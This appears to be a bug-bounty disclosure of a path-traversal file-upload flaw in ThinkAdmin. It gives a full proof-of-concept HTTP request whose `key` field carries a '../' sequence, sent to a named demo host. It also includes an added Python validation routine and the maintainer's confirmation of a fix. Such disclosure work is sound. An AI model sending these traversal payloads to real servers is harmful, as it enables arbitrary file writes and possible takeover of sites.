External Control of File Name or Path in zoujingli/thinkadmin

Valid

Reported on Sep 15th 2021

Description

A file can be uploaded to an arbitrary path on the server via path traversal in the upload `key` form field.

Proof of Concept

A user can upload a file to any path by supplying a path-traversal sequence in the `key` form field of the upload request:

POST /admin/api.upload/file.html HTTP/2
Host: v6.thinkadmin.top
Cookie: lang=zh-cn; PHPSESSID=88a2945fb139bb74f87137d2144709ab; limit=20
Content-Length: 14170
Sec-Ch-Ua: "Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"
Accept: text/plain, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAn0D7Qsi6kRX5BBr
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://v6.thinkadmin.top
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://v6.thinkadmin.top/admin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="key"

e4/../949bdb5f9077bfed982ca9b7bfadbeb.jpg
------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="safe"

0
------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="uptype"

local
------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="file"; filename="aaa.jpg"
Content-Type: image/jpeg

ÿØÿà

Here you can see I can traverse the path e4/../949bdb5f9077bfed982ca9b7bfadbeb.jpg and it will upload the file.
Now you can access the file by going to https://v6.thinkadmin.top//upload/949bdb5f9077bfed982ca9b7bfadbeb.jpg .
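As an added, defender-side illustration (Python, not ThinkAdmin's PHP code and not the maintainer's actual fix), here is the pair of checks an upload handler needs before using a client-supplied `key` like the one in the request above: an allow-list on each path segment, and a containment check on the normalized target path. The upload root directory is an assumed value.

```python
# Added example (not ThinkAdmin's code): server-side validation of a
# client-supplied upload "key" so the stored file cannot leave the upload root.
import posixpath
import re
from typing import Optional

# Assumed upload root; the real deployment path is not stated in the report.
UPLOAD_ROOT = "/var/www/public/upload"

# Directory segments and file stems: plain alphanumerics only (no dots, so
# "." and ".." can never appear as a segment). Extensions come from an
# allow-list so a traversal-free key still cannot drop a script file.
_SEGMENT_RE = re.compile(r"[A-Za-z0-9_-]+")
_ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf"}


def is_safe_key(key: str) -> bool:
    """True only if `key` is a relative path of plain segments with an allowed extension."""
    if not key or "\x00" in key or "\\" in key or key.startswith("/"):
        return False
    *dirs, name = key.split("/")
    if any(not _SEGMENT_RE.fullmatch(seg) for seg in dirs):
        return False
    stem, dot, ext = name.rpartition(".")
    return bool(dot) and _SEGMENT_RE.fullmatch(stem) is not None and ext.lower() in _ALLOWED_EXT


def resolve_upload_path(upload_root: str, key: str) -> Optional[str]:
    """Join root and key; return the absolute target, or None if the key is rejected.

    Two independent checks: the allow-list above, and a containment check on the
    normalized result so that any '..' that somehow slipped through still fails.
    """
    if not is_safe_key(key):
        return None
    root = posixpath.normpath(upload_root)
    target = posixpath.normpath(posixpath.join(root, key))
    if not target.startswith(root + "/"):
        return None
    return target


if __name__ == "__main__":
    # The key from the report's request, and a traversal-free variant of it.
    for k in ("e4/../949bdb5f9077bfed982ca9b7bfadbeb.jpg",
              "e4/949bdb5f9077bfed982ca9b7bfadbeb.jpg"):
        print(repr(k), "->", resolve_upload_path(UPLOAD_ROOT, k))
```

A rejected key should be logged with the session identifier, since a `..` in an upload key is never produced by the legitimate client and is a reliable indicator of probing.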

Impact

This vulnerability is capable of...

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back (8 days ago)
邹景立 validated this vulnerability (8 days ago)
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
邹景立 confirmed that a fix has been merged on 29b05d (8 days ago)
邹景立 has been awarded the fix bounty
邹景立 (Maintainer), 8 days ago:

Subsequent adjustment:

https://gitee.com/zoujingli/ThinkAdmin/blob/v6/app/admin/controller/api/Upload.php#L115